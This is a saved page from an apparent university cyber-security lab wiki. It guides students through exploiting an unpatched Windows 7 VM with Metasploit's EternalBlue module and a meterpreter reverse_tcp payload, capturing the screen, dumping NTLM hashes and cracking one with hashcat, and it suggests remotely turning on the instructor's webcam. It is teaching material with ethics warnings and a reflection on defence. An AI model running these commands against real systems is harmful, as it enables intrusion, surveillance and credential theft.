<!DOCTYPE html>
<html class="client-js" lang="en" dir="ltr"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>EternalBlue Windows 7 - csn</title>
<script>document.documentElement.className="client-js";RLCONF={"wgCanonicalNamespace":"","wgCanonicalSpecialPageName":!1,"wgNamespaceNumber":0,"wgPageName":"EternalBlue_Windows_7","wgTitle":"EternalBlue Windows 7","wgCurRevisionId":2086,"wgRevisionId":2086,"wgArticleId":328,"wgIsArticle":!0,"wgIsRedirect":!1,"wgAction":"view","wgUserName":"David","wgUserGroups":["bureaucrat","sysop","*","user","autoconfirmed"],"wgCategories":[],"wgBreakFrames":!1,"wgPageContentLanguage":"en","wgPageContentModel":"wikitext","wgSeparatorTransformTable":["",""],"wgDigitTransformTable":["",""],"wgDefaultDateFormat":"dmy","wgMonthNames":["","January","February","March","April","May","June","July","August","September","October","November","December"],"wgMonthNamesShort":["","Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"wgRelevantPageName":"EternalBlue_Windows_7","wgRelevantArticleId":328,"wgRequestId":"5e7d488053aa6111affef026","wgCSPNonce":!1,"wgUserId":2,"wgUserEditCount":
2112,"wgUserRegistration":1581555360000,"wgUserNewMsgRevisionId":null,"wgIsProbablyEditable":!0,"wgRelevantPageIsProbablyEditable":!0,"wgRestrictionEdit":[],"wgRestrictionMove":[]};RLSTATE={"site.styles":"ready","noscript":"ready","user.styles":"ready","user":"ready","user.options":"loading","user.tokens":"loading","mediawiki.legacy.shared":"ready","mediawiki.legacy.commonPrint":"ready","mediawiki.toc.styles":"ready","mediawiki.skinning.interface":"ready","skins.vector.styles":"ready"};RLPAGEMODULES=["site","mediawiki.page.startup","mediawiki.page.ready","mediawiki.toc","mediawiki.searchSuggest","mediawiki.page.watch.ajax","skins.vector.js"];</script>
<script>(RLQ=window.RLQ||[]).push(function(){mw.loader.implement("user.options@h4wdi",function($,jQuery,require,module){/*@nomin*/mw.user.options.set({"rcfilters-limit":"50","rcfilters-rc-collapsed":0,"rcfilters-saved-queries":"{\"queries\":{},\"version\":\"2\"}","rcfilters-wl-collapsed":0,"rcfilters-wl-saved-queries":"{\"queries\":{},\"version\":\"2\"}"});
});mw.loader.implement("user.tokens@tffin",function($,jQuery,require,module){/*@nomin*/mw.user.tokens.set({"editToken":"1de9c9bdb1e0caa57029da74fc3efe15673d3500+\\","patrolToken":"27c5e47cc649dfd68b9e494504c615f3673d3500+\\","watchToken":"29c5f123706ef964d2a218c701611e72673d3500+\\","csrfToken":"1de9c9bdb1e0caa57029da74fc3efe15673d3500+\\"});
});});</script>
<link rel="stylesheet" href="EternalBlue%20Windows%207%20-%20csn_files/load.css">
<script async="" src="EternalBlue%20Windows%207%20-%20csn_files/load.js"></script>
<meta name="generator" content="MediaWiki 1.34.0">
<link rel="alternate" type="application/x-wiki" title="Edit" href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit">
<link rel="edit" title="Edit" href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit">
<link rel="shortcut icon" href="https://csn.murdoch.edu.au/favicon.ico">
<link rel="search" type="application/opensearchdescription+xml" href="https://csn.murdoch.edu.au/mediawiki/opensearch_desc.php" title="csn (en)">
<link rel="EditURI" type="application/rsd+xml" href="https://csn.murdoch.edu.au/mediawiki/api.php?action=rsd">
<link rel="license" href="https://creativecommons.org/licenses/by-sa/4.0/">
<link rel="alternate" type="application/atom+xml" title="csn Atom feed" href="https://csn.murdoch.edu.au/mediawiki/index.php?title=Special:RecentChanges&amp;feed=atom">
<!--[if lt IE 9]><script src="/mediawiki/resources/lib/html5shiv/html5shiv.js"></script><![endif]-->
<style>
.suggestions{overflow:hidden;position:absolute;top:0;left:0;width:0;border:0;z-index:1099;padding:0;margin:-1px 0 0 0}.suggestions-special{position:relative;background-color:#fff;cursor:pointer;border:1px solid #a2a9b1;margin:0;margin-top:-2px;display:none;padding:0.25em 0.25em;line-height:1.25em}.suggestions-results{background-color:#fff;cursor:pointer;border:1px solid #a2a9b1;padding:0;margin:0}.suggestions-result{color:#000;margin:0;line-height:1.5em;padding:0.01em 0.25em;text-align:left; overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.suggestions-result-current{background-color:#2a4b8d;color:#fff}.suggestions-special .special-label{color:#72777d;text-align:left}.suggestions-special .special-query{color:#000;font-style:italic;text-align:left}.suggestions-special .special-hover{background-color:#c8ccd1}.suggestions-result-current .special-label,.suggestions-result-current .special-query{color:#fff}.highlight{font-weight:bold}
@media screen {
	.tochidden,.toctoggle{-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;user-select:none}.toctoggle{font-size:94%}}
@media print {
	.toc.tochidden,.toctoggle{display:none}}</style><style>
.suggestions a.mw-searchSuggest-link,.suggestions a.mw-searchSuggest-link:hover,.suggestions a.mw-searchSuggest-link:active,.suggestions a.mw-searchSuggest-link:focus{color:#000;text-decoration:none}.suggestions-result-current a.mw-searchSuggest-link,.suggestions-result-current a.mw-searchSuggest-link:hover,.suggestions-result-current a.mw-searchSuggest-link:active,.suggestions-result-current a.mw-searchSuggest-link:focus{color:#fff}.suggestions a.mw-searchSuggest-link .special-query{ overflow:hidden;text-overflow:ellipsis;white-space:nowrap}</style></head>
<body class="mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject mw-editable page-EternalBlue_Windows_7 rootpage-EternalBlue_Windows_7 skin-vector action-view" data-new-gr-c-s-check-loaded="8.912.0" data-gr-ext-installed="">
<div id="mw-page-base" class="noprint"></div>
<div id="mw-head-base" class="noprint"></div>
<div id="content" class="mw-body" role="main">
	<a id="top"></a>
	
	<div class="mw-indicators mw-body-content">
</div>

	<h1 id="firstHeading" class="firstHeading" lang="en">EternalBlue Windows 7</h1>
	
	<div id="bodyContent" class="mw-body-content">
		<div id="siteSub" class="noprint">From csn</div>
		<div id="contentSub"></div>
		
		
		
		<div id="jump-to-nav"></div>
		<a class="mw-jump-link" href="#mw-head">Jump to navigation</a>
		<a class="mw-jump-link" href="#p-search">Jump to search</a>
		<div id="mw-content-text" lang="en" dir="ltr" class="mw-content-ltr"><div class="mw-parser-output"><div class="thumb tright"><div class="thumbinner" style="width:635px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Metasploit.png" class="image"><img alt="Kali Running Metasploit" src="EternalBlue%20Windows%207%20-%20csn_files/633px-Metasploit.png" decoding="async" width="633" height="700" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/Metasploit.png 1.5x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Metasploit.png" class="internal" title="Enlarge"></a></div>Kali Running Metasploit</div></div></div>
<p>In this lab, we will learn how to use the EternalBlue vulnerability 
on an unpatched Windows 7 host. This exploit was linked to the NSA but 
has since been patched on all Windows versions. We will use Metasploit 
on Kali Linux to make this process a little easier. We will also use 
Metasploit to dump some password hashes, which can sometimes be cracked 
to reveal the original password.
</p><p><b>This is for educational purposes only. Attacking computers or 
equipment without permission is unethical and is against the law. The 
simple rule to keep you within the lines in the Cyberworld is to ask 
yourself; do you own it and is it in use? You should only practice your 
cyber skills on devices/networks that you own, or have written 
permission to exploit, and devices/networks that are not in use</b>
</p><p><b>I also want to emphasise that, in this space, there are large 
rewards in terms of high paying jobs for doing things right and massive 
jail sentences for those that don't operate properly in the world. 
Decrypting packets and/or accessing someone’s network without their 
consent is illegal. The purpose of this lab is not to encourage students
 to break into vulnerable networks but to show the techniques that 
malicious hackers would use.</b> 
</p><p><b>At the end of this activity, we will reflect on what we could 
do to prevent these sorts of attacks or at least limit the damage. We 
will also reflect on the ethics of vulnerability disclosure in the 
digital world.</b>
</p>
<div id="toc" class="toc"><input type="checkbox" role="button" id="toctogglecheckbox" class="toctogglecheckbox" style="display:none"><div class="toctitle" lang="en" dir="ltr"><h2>Contents</h2><span class="toctogglespan"><label class="toctogglelabel" for="toctogglecheckbox"></label></span></div>
<ul>
<li class="toclevel-1 tocsection-1"><a href="#Setup"><span class="tocnumber">1</span> <span class="toctext">Setup</span></a></li>
<li class="toclevel-1 tocsection-2"><a href="#Exploiting_Windows_7_with_EternalBlue"><span class="tocnumber">2</span> <span class="toctext">Exploiting Windows 7 with EternalBlue</span></a>
<ul>
<li class="toclevel-2 tocsection-3"><a href="#Starting_up_Metasploit"><span class="tocnumber">2.1</span> <span class="toctext">Starting up Metasploit</span></a></li>
<li class="toclevel-2 tocsection-4"><a href="#Getting_the_IP_address_of_your_Windows_7_Machine"><span class="tocnumber">2.2</span> <span class="toctext">Getting the IP address of your Windows 7 Machine</span></a></li>
<li class="toclevel-2 tocsection-5"><a href="#Setting_the_target_to_attack_in_Metasploit"><span class="tocnumber">2.3</span> <span class="toctext">Setting the target to attack in Metasploit</span></a></li>
<li class="toclevel-2 tocsection-6"><a href="#Getting_the_IP_address_in_Kali_Linux"><span class="tocnumber">2.4</span> <span class="toctext">Getting the IP address in Kali Linux</span></a></li>
<li class="toclevel-2 tocsection-7"><a href="#Setting_the_local_IP_in_Metasploit"><span class="tocnumber">2.5</span> <span class="toctext">Setting the local IP in Metasploit</span></a></li>
<li class="toclevel-2 tocsection-8"><a href="#Running_EternalBlue_and_controlling_the_Windows_7_machine"><span class="tocnumber">2.6</span> <span class="toctext">Running EternalBlue and controlling the Windows 7 machine</span></a></li>
<li class="toclevel-2 tocsection-9"><a href="#Advanced:_Turning_on_a_remote_Webcam_on_the_Instructor.27s_PC"><span class="tocnumber">2.7</span> <span class="toctext">Advanced: Turning on a remote Webcam on the Instructor's PC</span></a></li>
</ul>
</li>
<li class="toclevel-1 tocsection-10"><a href="#Pivoting_with_Password_Hashes"><span class="tocnumber">3</span> <span class="toctext">Pivoting with Password Hashes</span></a></li>
<li class="toclevel-1 tocsection-11"><a href="#Reflection"><span class="tocnumber">4</span> <span class="toctext">Reflection</span></a></li>
<li class="toclevel-1 tocsection-12"><a href="#Extra_Time.3F"><span class="tocnumber">5</span> <span class="toctext">Extra Time?</span></a></li>
</ul>
</div>

<h2><span class="mw-headline" id="Setup">Setup</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=1" title="Edit section: Setup">edit</a><span class="mw-editsection-bracket">]</span></span></h2>
<p>Log in using the outreach username and password.
</p><p>Start the lab by opening VMware and opening the Windows 7 image and the Kali Linux image. 
</p><p>You can log into kali with:
</p>
<pre>username: kali
password: kali
</pre>
<div class="thumb tright"><div class="thumbinner" style="width:603px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Metasploit_options.png" class="image"><img alt="Metasploit options" src="EternalBlue%20Windows%207%20-%20csn_files/601px-Metasploit_options.png" decoding="async" width="601" height="400" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/Metasploit_options.png 1.5x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Metasploit_options.png" class="internal" title="Enlarge"></a></div>Metasploit options</div></div></div>
<h2><span class="mw-headline" id="Exploiting_Windows_7_with_EternalBlue">Exploiting Windows 7 with EternalBlue</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=2" title="Edit section: Exploiting Windows 7 with EternalBlue">edit</a><span class="mw-editsection-bracket">]</span></span></h2>
<h3><span class="mw-headline" id="Starting_up_Metasploit">Starting up Metasploit</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=3" title="Edit section: Starting up Metasploit">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>On the Kali VM we are going to open the terminal and type the following commands:
</p>
<pre>service postgresql start
msfconsole
</pre>
<p><b>hint:</b> the password is student
</p><p>We are then going to use the following exploit on our machine:
</p>
<pre>use exploit/windows/smb/ms17_010_eternalblue
</pre>
<p>Once selected we need to fill out some options for this to work:
</p>
<pre>options
</pre> 
<p>Your output should look like the Metasploit Options image to the right:
</p><p>We will set these options in the sections below.
</p>
<h3><span class="mw-headline" id="Getting_the_IP_address_of_your_Windows_7_Machine">Getting the IP address of your Windows 7 Machine</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=4" title="Edit section: Getting the IP address of your Windows 7 Machine">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>You will need to open the Windows command prompt and type:
</p>
<pre>ipconfig
</pre>
<p>We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)
</p><p>In this example you can see the ip address is 134.115.148.165.
</p><p><b>If you get a 169.x.x.x address then you will need to go into 
the Virtual Machine network settings and set it to: Custom LAN Red. This
 will be demonstrated by your tutor</b>
</p>
<div class="center"><div class="thumb tnone"><div class="thumbinner" style="width:535px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Win7-ip.PNG" class="image"><img alt="Identifying the Windows 7 IP" src="EternalBlue%20Windows%207%20-%20csn_files/533px-Win7-ip.PNG" decoding="async" width="533" height="400" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/Win7-ip.PNG 1.5x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Win7-ip.PNG" class="internal" title="Enlarge"></a></div>Identifying the Windows 7 IP</div></div></div></div>
<div class="thumb tright"><div class="thumbinner" style="width:540px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Kali-terminal.PNG" class="image"><img alt="Kali set rhost" src="EternalBlue%20Windows%207%20-%20csn_files/538px-Kali-terminal.PNG" decoding="async" width="538" height="400" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/806px-Kali-terminal.PNG 1.5x, EternalBlue%20Windows%207%20-%20csn_files/Kali-terminal.PNG 2x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Kali-terminal.PNG" class="internal" title="Enlarge"></a></div>Kali set rhost</div></div></div>
<h3><span class="mw-headline" id="Setting_the_target_to_attack_in_Metasploit">Setting the target to attack in Metasploit</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=5" title="Edit section: Setting the target to attack in Metasploit">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>In Kali Linux, we now need to set the host to attack (the Windows 7 machine)
</p>
<pre>set rhosts 134.115.148.xxx
</pre>
<p>This will be the IP address you got earlier.
</p><p>We will now set the payload which will infect the Windows 7 machine. This software will allow us to control the machine remotely
</p>
<pre>set payload windows/x64/meterpreter/reverse_tcp
</pre>
<p>We now need to tell Metasploit the IP address of our Kali Linux machine.
</p>
<h3><span class="mw-headline" id="Getting_the_IP_address_in_Kali_Linux">Getting the IP address in Kali Linux</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=6" title="Edit section: Getting the IP address in Kali Linux">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>Open a new terminal window and type this command to get the IP address:
</p>
<pre>ifconfig
</pre>
<p>We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)
</p><p>In this example, you can see the IP address is 134.115.148.147
</p>
<div class="center"><div class="thumb tnone"><div class="thumbinner" style="width:538px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Kali-ip.PNG" class="image"><img alt="Kali IP" src="EternalBlue%20Windows%207%20-%20csn_files/536px-Kali-ip.PNG" decoding="async" width="536" height="400" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/804px-Kali-ip.PNG 1.5x, EternalBlue%20Windows%207%20-%20csn_files/Kali-ip.PNG 2x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Kali-ip.PNG" class="internal" title="Enlarge"></a></div>Kali IP</div></div></div></div>
<h3><span class="mw-headline" id="Setting_the_local_IP_in_Metasploit">Setting the local IP in Metasploit</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=7" title="Edit section: Setting the local IP in Metasploit">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>in the terminal window on the kali machine type:
</p>
<pre>set lhost 134.115.148.xxx
</pre>
<p>then set the port:
</p>
<pre>set lport 4321
</pre>
<h3><span class="mw-headline" id="Running_EternalBlue_and_controlling_the_Windows_7_machine">Running EternalBlue and controlling the Windows 7 machine</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=8" title="Edit section: Running EternalBlue and controlling the Windows 7 machine">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>We are now going to run this exploit and can test out things like watching the screen or turning the webcam on remotely.
</p><p>In the Kali terminal, run the exploit:
</p>
<pre>run
</pre>
<p>You should get this output:
</p>
<div class="center"><div class="thumb tnone"><div class="thumbinner" style="width:882px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Running_eternal_blue.png" class="image"><img alt="Running the EternalBlue attack" src="EternalBlue%20Windows%207%20-%20csn_files/Running_eternal_blue.png" decoding="async" width="880" height="385" class="thumbimage"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Running_eternal_blue.png" class="internal" title="Enlarge"></a></div>Running the EternalBlue attack</div></div></div></div>
<p>We now have control of the machine and you can try out some commands such as:
</p>
<pre>sysinfo
</pre>
<p>This will tell us about the type of Windows machine that is running
</p><p>Try
</p>
<pre>screenshare
</pre>
<p>This will open a browser window where we can see what is on screen. Hit Ctrl+C to close this down.
</p><p>Let's try creating a directory on Windows: 
</p>
<pre>mkdir C:/Users/Murdoch/Desktop/1337-hacker
</pre>
<p>Now look on your Windows 7 Desktop. Can you see the directory that we just created?
</p><p>To see all the possible options, issue a: 
</p>
<pre>?
</pre>

<p><b>hint:</b> to close a current command press control-c
</p>
<h3><span id="Advanced:_Turning_on_a_remote_Webcam_on_the_Instructor's_PC"></span><span class="mw-headline" id="Advanced:_Turning_on_a_remote_Webcam_on_the_Instructor.27s_PC">Advanced: Turning on a remote Webcam on the Instructor's PC</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=9" title="Edit section: Advanced: Turning on a remote Webcam on the Instructor's PC">edit</a><span class="mw-editsection-bracket">]</span></span></h3>
<p>How would you remotely turn on someone's webcam?
</p><p>The instructor of the class may have a webcam installed. Can you turn on the instructor's webcam? You may need help with this. 
</p>
<h2><span class="mw-headline" id="Pivoting_with_Password_Hashes">Pivoting with Password Hashes</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=10" title="Edit section: Pivoting with Password Hashes">edit</a><span class="mw-editsection-bracket">]</span></span></h2>
<p>Many real-world hacks feature many pivot points. The infamous 
LinkedIn compromise was an example of this. A LinkedIn developer had put
 some LinkedIn credentials on a home machine. The compromise began when a
 soft target, a developers home machine, was compromised. The attackers 
then pivoted from there. In this next example, we will show you what 
this sort of a pivot can look like.
</p><p>Again, if you are employed to protect a company network, it is 
very unlikely that they will be running unpatched Windows 7 machines. If
 they are doing this, you have a real problem on your hands. So there is
 little chance that this sort of machine would be seen on a large 
company network, but these will still exist at home, and that can be an 
attackers pivot point.
</p><p>Let's extract the password hashes from the windows machine with
</p>
<pre>hashdump
</pre>
<p>Find the username LinkedIn. We think that this user may be reusing 
passwords between their home and work computers. If we can crack their 
home password, then maybe we can use the same password on a work 
machine. A password hash is a bit different from encryption. When we use
 encryption see use a key to hide the message. Hash functions are 
supposed to be one way, but they are still vulnerable to brute force 
attacks. 
</p>
 <div class="center"><div class="thumb tnone"><div class="thumbinner" style="width:705px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Hash_dump.PNG" class="image"><img alt="Using metasploit to dump the NTLM hashes" src="EternalBlue%20Windows%207%20-%20csn_files/Hash_dump.PNG" decoding="async" width="703" height="54" class="thumbimage"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Hash_dump.PNG" class="internal" title="Enlarge"></a></div>Using metasploit to dump the NTLM hashes</div></div></div></div>
<p>We know that Windows 7 would hash passwords using an algorithm called NTLM. 
</p><p>Now lets manually extract the password hash 
</p>
<pre>cca4d46bdf8ab23cb17704bfd93a10b9
</pre>
<p>Save this as a text file called linkedin_hash
</p><p>Now we are going to crack it with hashcat, but before we do, I 
want us to download a password list. I have provided one for you here. 
Open up a new terminal and can get it with:
</p>
<pre>wget <a rel="nofollow" class="external free" href="https://csn.murdoch.edu.au/words_alpha.txt">https://csn.murdoch.edu.au/words_alpha.txt</a>
</pre>
<p>Now before you move on, issue an:
</p>
<pre>ls
</pre>
<p>You should see two files <i>linkedin_hash</i> and <i>words_alpha.txt</i>. If you do not then ask for help.
</p><p>We are now going to see if we can crack the linked in password hash with some software called hashcat. 
</p>
<pre>hashcat -m 1000 -a 0 -o cracked_passwords.txt linkedin_hash words_alpha.txt --show
</pre>
<p>Now issue another:
</p>
<pre>ls
</pre>
<p>We should see a new file called <i>cracked_passwords.txt</i>. Open this with:
</p>
<pre>cat cracked_passwords.txt
</pre>
<h2><span class="mw-headline" id="Reflection">Reflection</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=11" title="Edit section: Reflection">edit</a><span class="mw-editsection-bracket">]</span></span></h2>
<p>In this activity, we targeted an insecure Windows 7 machine. We 
exploited it with an NSA exploit that was stolen by a hacking group 
called the Shadow Brokers. We then dumped the password hashes and 
cracked the actual passwords with the idea of pivoting into other 
devices, accounts or networks. Chat with your partner in class about 
what could be done to prevent this attack. Think about things that we 
could do to limit the damage. 
</p><p>Is it ethical for Nation State actors, as in governments, to find
 Zero day exploits and then not disclose them? Why do you think a 
government might find exploits in products and then hold onto them? 
Create an argument both for and against this dilemma.
</p><p>If you have time have a read about: 
</p>
<pre>*<a rel="nofollow" class="external free" href="https://en.wikipedia.org/wiki/Responsible_disclosure">https://en.wikipedia.org/wiki/Responsible_disclosure</a>
*<a rel="nofollow" class="external free" href="https://en.wikipedia.org/wiki/Bug_bounty_program">https://en.wikipedia.org/wiki/Bug_bounty_program</a>
</pre>
<h2><span id="Extra_Time?"></span><span class="mw-headline" id="Extra_Time.3F">Extra Time?</span><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit&amp;section=12" title="Edit section: Extra Time?">edit</a><span class="mw-editsection-bracket">]</span></span></h2>
<p>If you still have time, hackers like to leave a sign or a message. 
</p><p>Create some ascii art here: <a rel="nofollow" class="external free" href="https://patorjk.com/software/taag/#p=display&amp;f=Graffiti&amp;t=Type%20Something%20">https://patorjk.com/software/taag/#p=display&amp;f=Graffiti&amp;t=Type%20Something%20</a>
</p><p>Put it in a text file and upload it to the windows machine. If you use the: 
</p>
<pre>? 
</pre>
<p>In Metasploit, you will see that there is an upload feature:
</p>
<pre>upload alias C:/Users/Murdoch/Desktop/
</pre>
<div class="center"><div class="thumb tnone"><div class="thumbinner" style="width:536px;"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Alias.PNG" class="image"><img alt="Upload your alias" src="EternalBlue%20Windows%207%20-%20csn_files/534px-Alias.PNG" decoding="async" width="534" height="400" class="thumbimage" srcset="EternalBlue%20Windows%207%20-%20csn_files/800px-Alias.PNG 1.5x, EternalBlue%20Windows%207%20-%20csn_files/Alias.PNG 2x"></a>  <div class="thumbcaption"><div class="magnify"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/File:Alias.PNG" class="internal" title="Enlarge"></a></div>Upload your alias</div></div></div></div>
<!-- 
NewPP limit report
Cached time: 20241119221519
Cache expiry: 86400
Dynamic content: false
Complications: []
CPU time usage: 0.031 seconds
Real time usage: 0.037 seconds
Preprocessor visited node count: 92/1000000
Preprocessor generated node count: 0/1000000
Post‐expand include size: 0/2097152 bytes
Template argument size: 0/2097152 bytes
Highest expansion depth: 2/40
Expensive parser function count: 0/100
Unstrip recursion depth: 0/20
Unstrip post‐expand size: 347/5000000 bytes
-->
<!--
Transclusion expansion time report (%,ms,calls,template)
100.00%    0.000      1 -total
-->

<!-- Saved in parser cache with key my_wiki:pcache:idhash:328-0!canonical and timestamp 20241119221518 and revision id 2086
 -->
</div></div>
		
		<div class="printfooter">Retrieved from "<a dir="ltr" href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;oldid=2086">https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;oldid=2086</a>"</div>
		
		<div id="catlinks" class="catlinks catlinks-allhidden" data-mw="interface"></div>
		<div class="visualClear"></div>
		
	</div>
</div>


		<div id="mw-navigation">
			<h2>Navigation menu</h2>
			<div id="mw-head">
									<div id="p-personal" role="navigation" aria-labelledby="p-personal-label">
						<h3 id="p-personal-label">Personal tools</h3>
						<ul>
							<li id="pt-userpage"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/User:David" class="new" dir="auto" title="Your user page (page does not exist) [Alt+Shift+.]" accesskey=".">David</a></li><li id="pt-mytalk"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/User_talk:David" class="new" title="Your talk page (page does not exist) [Alt+Shift+n]" accesskey="n">Talk</a></li><li id="pt-preferences"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:Preferences" title="Your preferences">Preferences</a></li><li id="pt-watchlist"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:Watchlist" title="A list of pages you are monitoring for changes [Alt+Shift+l]" accesskey="l">Watchlist</a></li><li id="pt-mycontris"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:Contributions/David" title="A list of your contributions [Alt+Shift+y]" accesskey="y">Contributions</a></li><li id="pt-logout"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=Special:UserLogout&amp;returnto=EternalBlue+Windows+7" title="Log out">Log out</a></li>						</ul>
					</div>
									<div id="left-navigation">
										<div id="p-namespaces" role="navigation" class="vectorTabs" aria-labelledby="p-namespaces-label">
						<h3 id="p-namespaces-label">Namespaces</h3>
						<ul>
							<li id="ca-nstab-main" class="selected"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php/EternalBlue_Windows_7" title="View the content page [Alt+Shift+c]" accesskey="c">Page</a></span></li><li id="ca-talk" class="new"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=Talk:EternalBlue_Windows_7&amp;action=edit&amp;redlink=1" rel="discussion" title="Discussion about the content page (page does not exist) [Alt+Shift+t]" accesskey="t">Discussion</a></span></li>						</ul>
					</div>
										<div id="p-variants" role="navigation" class="vectorMenu emptyPortlet" aria-labelledby="p-variants-label">
												<input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-variants-label">
						<h3 id="p-variants-label">
							<span>Variants</span>
						</h3>
						<ul class="menu">
													</ul>
					</div>
									</div>
				<div id="right-navigation">
										<div id="p-views" role="navigation" class="vectorTabs" aria-labelledby="p-views-label">
						<h3 id="p-views-label">Views</h3>
						<ul>
							<li id="ca-view" class="collapsible selected"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php/EternalBlue_Windows_7">Read</a></span></li><li id="ca-edit" class="collapsible"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=edit" title="Edit this page [Alt+Shift+e]" accesskey="e">Edit</a></span></li><li id="ca-history" class="collapsible"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=history" title="Past revisions of this page [Alt+Shift+h]" accesskey="h">View history</a></span></li><li id="ca-unwatch" class="collapsible icon mw-watchlink"><span><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=unwatch" data-mw="interface" title="Remove this page from your watchlist [Alt+Shift+w]" accesskey="w">Unwatch</a></span></li>						</ul>
					</div>
										<div id="p-cactions" role="navigation" class="vectorMenu" aria-labelledby="p-cactions-label">
						<input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-cactions-label">
						<h3 id="p-cactions-label"><span>More</span></h3>
						<ul class="menu">
							<li id="ca-delete"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=delete" title="Delete this page [Alt+Shift+d]" accesskey="d">Delete</a></li><li id="ca-move"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:MovePage/EternalBlue_Windows_7" title="Move this page [Alt+Shift+m]" accesskey="m">Move</a></li><li id="ca-protect"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=protect" title="Protect this page [Alt+Shift+=]" accesskey="=">Protect</a></li>						</ul>
					</div>
										<div id="p-search" role="search">
